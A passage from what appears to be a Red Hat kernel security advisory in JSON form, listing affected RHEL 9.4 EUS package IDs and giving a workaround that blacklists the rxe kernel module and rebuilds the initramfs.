"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the `rxe` kernel module from loading. This can be achieved by creating a blacklist rule.\n\n1. Create a file `/etc/modprobe.d/blacklist-rxe.conf` with the following content:\n```\nblacklist rxe\ninstall rxe /bin/true\n```\n2. Rebuild the initial ramdisk:\n```bash\ndracut -f -v\n```\n3. Reboot the system for the changes to take effect.\n\nWarning: Blacklisting the `rxe` module may impact functionality that relies on Soft RoCE.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
